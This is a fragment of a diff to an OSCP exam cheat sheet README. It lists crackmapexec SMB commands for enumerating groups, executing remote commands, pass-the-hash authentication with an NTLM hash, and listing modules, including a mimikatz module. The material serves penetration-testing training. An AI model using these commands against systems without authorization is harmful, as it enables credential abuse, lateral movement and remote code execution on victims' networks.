saisathvik1/OSCP-Cheatsheet/README.md

 crackmapexec smb <Rhost/range> -u 'user' -p 'password' --groups {groupname} #we can also run with a specific group and enumerated users of that group. crackmapexec smb <Rhost/range> -u 'user' -p 'password' -x 'command' #For executing commands, "-x" for cmd and "-X" for powershell command

+#Pass the hash
+crackmapexec smb <ip or range> -u username -H <full hash> --local-auth
+#We can run all the above commands with hash and obtain more information

 #crackmapexec modules
 crackmapexec smb -L #listing modules crackmapexec smb -M mimikatx --options #shows the required options for the module